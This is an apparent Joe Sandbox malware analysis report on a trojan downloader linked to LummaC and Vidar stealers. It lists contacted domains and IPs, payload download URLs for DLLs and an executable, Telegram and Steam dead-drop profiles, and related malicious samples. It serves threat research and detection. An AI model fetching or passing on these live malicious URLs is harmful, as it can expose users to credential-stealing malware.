resinedyw.sbs	172.67.205.156	true	true	unknown
enlargkiw.sbs	104.21.33.249	true	true	unknown
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
condifendteu.sbs	104.21.79.35	true	true	unknown
steamcommunity.com	104.102.49.254	true	true	unknown
allocatinow.sbs	188.114.97.3	true	true	unknown
drawwyobstacw.sbs	188.114.96.3	true	true	unknown
vennurviot.sbs	172.67.140.193	true	true	unknown
ehticsprocw.sbs	104.21.30.221	true	true	unknown
s-part-0032.t-0009.t-msedge.net	13.107.246.60	true	false	unknown
kasm.zubairgul.com	95.164.90.97	true	true	unknown
cowod.hopto.org	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
enlargkiw.sbs	true		unknown
allocatinow.sbs	true		unknown
drawwyobstacw.sbs	true		unknown
http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe	false		unknown
mathcucom.sbs	true		unknown
http://kasm.zubairgul.com/vcruntime140.dll	true		unknown
http://kasm.zubairgul.com/softokn3.dll	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://vennurviot.sbs/api	true		unknown
ehticsprocw.sbs	true		unknown
http://kasm.zubairgul.com/msvcp140.dll	true		unknown
http://kasm.zubairgul.com/mozglue.dll	true		unknown
condifendteu.sbs	true		unknown
https://drawwyobstacw.sbs/api	true		unknown
http://kasm.zubairgul.com/freebl3.dll	true		unknown
https://allocatinow.sbs/api	true		unknown
http://kasm.zubairgul.com/nss3.dll	true		unknown
http://kasm.zubairgul.com/	true		unknown
http://kasm.zubairgul.com/sql.dll	true		unknown
https://resinedyw.sbs/api	true		unknown
https://mathcucom.sbs/api	true		unknown
resinedyw.sbs	true		unknown
https://t.me/maslengdsa	true		unknown
vennurviot.sbs	true		unknown
https://steamcommunity.com/profiles/76561199786602107	true		unknown
https://condifendteu.sbs/api	true		unknown
https://enlargkiw.sbs/api	true		unknown
https://sergei-esenin.com/api	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	JJDGCG.2.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	JJDGCG.2.dr	false	URL Reputation: safe	unknown
http://cowod.hopto.org	MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://drawwyobstacw.sbs/#	MSBuild.exe, 0000000D.00000002.2620262148.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com/	MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, AECAKE.2.dr	false	URL Reputation: safe	unknown
http://cowod.hopto.org_DEBUG.zip/c	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/::	MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com/b_	MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://kasm.zubairgul.com:80/sql.dll	MSBuild.exe, 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://drawwyobstacw.sbs/apif	MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://cowod.hopto.	MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://t.me/lpnjokeg0b4cMozilla/5.0	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://cowod.hopto	MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://kasm.zubairgul.com:80	MSBuild.exe, 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://www.mozilla.com/en-US/blocklist/	MSBuild.exe, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2563025623.000000006CA4D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr	false		unknown
https://mozilla.org0/	MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	false	URL Reputation: safe	unknown
http://www.entrust.net/rpa03	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t.me/lpnjoke	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	JJDGCG.2.dr	false	URL Reputation: safe	unknown
http://kasm.zubairgul.com:80ontent-Disposition:	MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	JJDGCG.2.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BGIIDA.2.dr	false	URL Reputation: safe	unknown
http://kasm.zubairgul.com/H	MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	BGIIDA.2.dr	false	URL Reputation: safe	unknown
http://cowod.multipart/form-data;	MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, AECAKE.2.dr	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, AECAKE.2.dr	false		unknown
http://kasm.zubairgul.com/sql.dllK%	MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/2048ca.crl0	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	false	URL Reputation: safe	unknown
https://www.entrust.net/rpa0	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	false	URL Reputation: safe	unknown
https://sergei-esenin.com/apia	MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://t.me/	MSBuild.exe, 00000002.00000002.2517585992.000000000152B000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://web.telegram.org	MSBuild.exe, 00000002.00000002.2517585992.000000000152B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net03	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	false	URL Reputation: safe	unknown
http://ocsp.entrust.net02	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	false	URL Reputation: safe	unknown
http://kasm.zubairgul.com/sql.dll1$	MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	AECAKE.2.dr	false		unknown
https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://cowod.hopto.IEBFCG	MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	JJDGCG.2.dr	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe1kkkk	MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	JJDGCG.2.dr	false	URL Reputation: safe	unknown
http://cowod.hoptoIECFBFI	MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/ts1ca.crl0	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	false	URL Reputation: safe	unknown
https://sergei-esenin.com/api9	MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/legal/	MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537675257.00000000205FD000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	JJDGCG.2.dr	false		unknown
http://cowod.hopto.org/	MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aia.entrust.net/ts1-chain256.cer01	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	false	URL Reputation: safe	unknown
https://drawwyobstacw.sbs/api0	MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.5.dr	false	URL Reputation: safe	unknown
http://kasm.zubairgul.com/vcruntime140.dll4k	MSBuild.exe, 00000002.00000002.2517585992.00000000014E8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, AECAKE.2.dr	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	JJDGCG.2.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, AECAKE.2.dr	false	URL Reputation: safe	unknown
https://enlargkiw.sbs/apiG	MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://t.me/maslengdsafdmskfj3efskoahttps://steamcommunity.com/profiles/76561199786602107g0b4cMozil	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, AECAKE.2.dr	false	URL Reputation: safe	unknown
http://kasm.zubairgul.com/mozglue.dllJ	MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://kasm.zubairgul.com/msvcp140.dllW	MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://cowod.hopto.orgFCG	MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/account/cookiepreferences/	MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org	BGIIDA.2.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/	MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	JJDGCG.2.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
95.164.90.97	kasm.zubairgul.com	Gibraltar	39762	VAKPoltavaUkraineUA	true
147.45.44.104	nsdm.cumpar-auto-orice-tip.ro	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
172.67.140.193	vennurviot.sbs	United States	13335	CLOUDFLARENETUS	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	true
172.67.206.204	sergei-esenin.com	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	allocatinow.sbs	European Union	13335	CLOUDFLARENETUS	true
104.21.33.249	enlargkiw.sbs	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	mathcucom.sbs	European Union	13335	CLOUDFLARENETUS	true
104.21.30.221	ehticsprocw.sbs	United States	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
172.67.205.156	resinedyw.sbs	United States	13335	CLOUDFLARENETUS	true
104.21.79.35	condifendteu.sbs	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1529305
Start date and time:	2024-10-08 20:46:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/37@14/12
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 93 Number of non-executed functions: 247
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.190.160.14, 40.126.32.72, 40.126.32.68, 40.126.32.76, 20.190.160.20, 40.126.32.134, 40.126.32.136, 20.190.160.22, 88.221.110.91, 2.16.100.168, 192.229.221.95, 20.12.23.50, 20.242.39.171, 13.89.179.12, 13.85.23.206, 20.42.73.29, 199.232.214.172
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, onedsblobprdcus17.centralus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Simulations

Behavior and APIs

Time	Type	Description
14:47:14	API Interceptor	2x Sleep call for process: WerFault.exe modified
14:47:21	API Interceptor	6x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
95.164.90.97	15PylGQjzK.exe	Get hash	malicious	LummaC, Vidar	Browse	kasm.zubairgul.com/
	Ji7kZhlqxz.exe	Get hash	malicious	LummaC, Vidar	Browse	kasm.zubairgul.com/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	kasm.zubairgul.com/
	VmRHSCaiyc.exe	Get hash	malicious	LummaC, Vidar	Browse	kasm.zubairgul.com/
	T2bmenoX1o.exe	Get hash	malicious	LummaC, Vidar	Browse	kasm.zubairgul.com/
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	kasm.zubairgul.com/
	WiTqtf1aiE.exe	Get hash	malicious	LummaC, Vidar	Browse	kasm.zubairgul.com/
	wULBz8VjH0.exe	Get hash	malicious	Vidar	Browse	lade.petperfectcare.com/
	f1r6P3j3g7.exe	Get hash	malicious	LummaC, Vidar	Browse	lade.petperfectcare.com/
	lCVFGKfczi.exe	Get hash	malicious	Vidar	Browse	lade.petperfectcare.com/
147.45.44.104	15PylGQjzK.exe	Get hash	malicious	LummaC, Vidar	Browse	nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
	Ji7kZhlqxz.exe	Get hash	malicious	LummaC, Vidar	Browse	nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
	20fUAMt5dL.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
	VmRHSCaiyc.exe	Get hash	malicious	LummaC, Vidar	Browse	nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
	hloRQZmlfg.exe	Get hash	malicious	RDPWrap Tool	Browse	147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
	T2bmenoX1o.exe	Get hash	malicious	LummaC, Vidar	Browse	nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
	http://hans.uniformeslaamistad.com/yuop/66e6ea133c92f_crypted.exe#xin	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	hans.uniformeslaamistad.com/yuop/66e6ea133c92f_crypted.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	https://hnt.zkg.mybluehost.me/CA/LET	Get hash	malicious	HTMLPhisher	Browse	50.6.153.248
	15PylGQjzK.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	Ji7kZhlqxz.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	VmRHSCaiyc.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	T2bmenoX1o.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	WiTqtf1aiE.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	https://s.craft.me/yB5midhwwaHUPW	Get hash	malicious	HTMLPhisher	Browse	104.21.27.108
	down.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
sergei-esenin.com	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	lHHfXU6Y37.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	VmRHSCaiyc.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.53.8
nsdm.cumpar-auto-orice-tip.ro	15PylGQjzK.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	Ji7kZhlqxz.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	20fUAMt5dL.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	147.45.44.104
	VmRHSCaiyc.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	T2bmenoX1o.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	lihZ6gUU7V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	147.45.44.104
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	WiTqtf1aiE.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	wULBz8VjH0.exe	Get hash	malicious	Vidar	Browse	147.45.44.104
fp2e7a.wpc.phicdn.net	https://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw==	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://dc.dolshgdh.site/?Ufrj=g5	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://1drv.ms/w/c/3e7c84f1a590a3e6/IQStDJr3bMEwQZDK5oU6uNI1AXa25ZxVanY0bWjgRrRk-d4	Get hash	malicious	Unknown	Browse	192.229.221.95
	15PylGQjzK.exe	Get hash	malicious	LummaC, Vidar	Browse	192.229.221.95
	https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAg	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://dvj-305jg-9h.car-financeclaim.co.uk/4-604-9vh-9h35g-h3.html#info@tintolaw.co.za	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://lifecodigestion.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	192.229.221.95
	https://simpleinvoices.io/invoices/gvexd57Lej7	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://js.schema-forms.org	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Purchase 2.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	shipment details.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	EY10AIvC8B.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	15PylGQjzK.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	Ji7kZhlqxz.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	JBybSK0HzG.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	05NN8zSK04.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
FREE-NET-ASFREEnetEU	15PylGQjzK.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	Ji7kZhlqxz.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	20fUAMt5dL.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	147.45.44.104
	7R4CQlalZQ.exe	Get hash	malicious	XWorm	Browse	193.233.255.34
	VmRHSCaiyc.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	147.45.44.104
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	147.45.44.104
